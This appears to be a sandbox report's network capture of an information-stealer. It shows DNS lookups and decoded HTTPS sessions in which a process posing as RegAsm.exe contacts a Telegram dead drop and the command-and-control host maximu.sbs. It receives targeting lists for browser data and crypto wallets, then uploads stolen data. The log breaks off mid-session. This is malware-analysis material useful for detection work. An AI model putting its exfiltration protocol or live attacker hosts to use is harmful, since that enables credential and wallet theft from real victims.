                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:07.336091995 CET6292153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:07.505172968 CET53629211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:08.487787008 CET5460453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:08.499952078 CET53546041.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:19.943213940 CET53496661.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:19.962867975 CET53516161.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:20.158667088 CET6244553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:20.158888102 CET6381053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:20.165708065 CET53624451.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:20.165723085 CET53638101.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:21.050949097 CET53628341.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:21.955854893 CET53518581.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:23.481942892 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:23.720503092 CET5045053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:23.720662117 CET5026753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:23.722817898 CET53518131.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:23.727489948 CET53502671.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:23.727895975 CET53504501.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:24.718585968 CET5460653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:24.718746901 CET6026053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:24.725342035 CET53546061.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:24.725467920 CET53602601.1.1.1192.168.2.4

                                                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:07.336091995 CET192.168.2.41.1.1.10xcdf0Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:08.487787008 CET192.168.2.41.1.1.10xaecStandard query (0)maximu.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:20.158667088 CET192.168.2.41.1.1.10x11bbStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:20.158888102 CET192.168.2.41.1.1.10x9a2fStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:23.720503092 CET192.168.2.41.1.1.10x9cceStandard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:23.720662117 CET192.168.2.41.1.1.10x3bebStandard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:24.718585968 CET192.168.2.41.1.1.10x9a8Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:24.718746901 CET192.168.2.41.1.1.10xe38bStandard query (0)play.google.com65IN (0x0001)false

                                                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:07.505172968 CET1.1.1.1192.168.2.40xcdf0No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:08.499952078 CET1.1.1.1192.168.2.40xaecNo error (0)maximu.sbs116.203.166.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:20.165708065 CET1.1.1.1192.168.2.40x11bbNo error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:20.165723085 CET1.1.1.1192.168.2.40x9a2fNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:23.727489948 CET1.1.1.1192.168.2.40x3bebNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:23.727895975 CET1.1.1.1192.168.2.40x9cceNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:23.727895975 CET1.1.1.1192.168.2.40x9cceNo error (0)plus.l.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:24.725342035 CET1.1.1.1192.168.2.40x9a8No error (0)play.google.com216.58.206.46A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                                                          • t.me
                                                                                                                                                                                                                                                          • maximu.sbs
                                                                                                                                                                                                                                                          • www.google.com
                                                                                                                                                                                                                                                          • apis.google.com

                                                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          0192.168.2.449731149.154.167.994437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:08 UTC85OUTGET /no111p HTTP/1.1
                                                                                                                                                                                                                                                          Host: t.me
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:08 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:08 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 12297
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: stel_ssid=f6a5a475418195720e_15622475863752498482; expires=Tue, 14 Jan 2025 19:18:08 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          Cache-control: no-store
                                                                                                                                                                                                                                                          X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                          2025-01-13 19:18:08 UTC12297INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6e 6f 31 31 31 70 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @no111p</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          1192.168.2.449732116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:09 UTC183OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:09 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          2192.168.2.449733116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:10 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----x4ozm7y5p8q1nycbaimg
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 255
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:10 UTC255OUTData Raw: 2d 2d 2d 2d 2d 2d 78 34 6f 7a 6d 37 79 35 70 38 71 31 6e 79 63 62 61 69 6d 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 36 39 39 37 43 31 46 32 46 41 38 33 35 31 30 32 31 31 34 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 78 34 6f 7a 6d 37 79 35 70 38 71 31 6e 79 63 62 61 69 6d 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 78 34 6f 7a 6d 37 79 35 70 38 71 31 6e 79 63 62 61 69 6d 67 2d 2d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: ------x4ozm7y5p8q1nycbaimgContent-Disposition: form-data; name="hwid"966997C1F2FA835102114-a33c7340-61ca------x4ozm7y5p8q1nycbaimgContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------x4ozm7y5p8q1nycbaimg--
                                                                                                                                                                                                                                                          2025-01-13 19:18:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:11 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:11 UTC69INData Raw: 33 61 0d 0a 31 7c 30 7c 31 7c 30 7c 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 7c 31 7c 31 7c 30 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 3a1|0|1|0|ef94700986d10e27c669a823d0d4c3f5|1|1|0|0|0|50000|00


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          3192.168.2.449734116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:11 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----as26fu3ekf37qie37y5f
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:11 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 61 73 32 36 66 75 33 65 6b 66 33 37 71 69 65 33 37 79 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 61 73 32 36 66 75 33 65 6b 66 33 37 71 69 65 33 37 79 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 61 73 32 36 66 75 33 65 6b 66 33 37 71 69 65 33 37 79 35 66 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------as26fu3ekf37qie37y5fContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------as26fu3ekf37qie37y5fContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------as26fu3ekf37qie37y5fCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:12 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:12 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                          Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          4192.168.2.449735116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:13 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----7yuk6fuaiwtjeuk6x4oh
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:13 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 37 79 75 6b 36 66 75 61 69 77 74 6a 65 75 6b 36 78 34 6f 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 37 79 75 6b 36 66 75 61 69 77 74 6a 65 75 6b 36 78 34 6f 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 37 79 75 6b 36 66 75 61 69 77 74 6a 65 75 6b 36 78 34 6f 68 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------7yuk6fuaiwtjeuk6x4ohContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------7yuk6fuaiwtjeuk6x4ohContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------7yuk6fuaiwtjeuk6x4ohCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:13 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:13 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:13 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                          Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          5192.168.2.449736116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:14 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----usrqq1v3wtj5f3wt000z
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 332
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:14 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 75 73 72 71 71 31 76 33 77 74 6a 35 66 33 77 74 30 30 30 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 75 73 72 71 71 31 76 33 77 74 6a 35 66 33 77 74 30 30 30 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 75 73 72 71 71 31 76 33 77 74 6a 35 66 33 77 74 30 30 30 7a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------usrqq1v3wtj5f3wt000zContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------usrqq1v3wtj5f3wt000zContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------usrqq1v3wtj5f3wt000zCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:15 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:15 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          6192.168.2.449737116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:16 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----a1d26x4wtrqqqi5phdj5
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 6401
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:16 UTC6401OUTData Raw: 2d 2d 2d 2d 2d 2d 61 31 64 32 36 78 34 77 74 72 71 71 71 69 35 70 68 64 6a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 61 31 64 32 36 78 34 77 74 72 71 71 71 69 35 70 68 64 6a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 61 31 64 32 36 78 34 77 74 72 71 71 71 69 35 70 68 64 6a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------a1d26x4wtrqqqi5phdj5Content-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------a1d26x4wtrqqqi5phdj5Content-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------a1d26x4wtrqqqi5phdj5Cont
                                                                                                                                                                                                                                                          2025-01-13 19:18:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:16 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:16 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          7192.168.2.449738116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:17 UTC275OUTPOST / HTTP/1.1
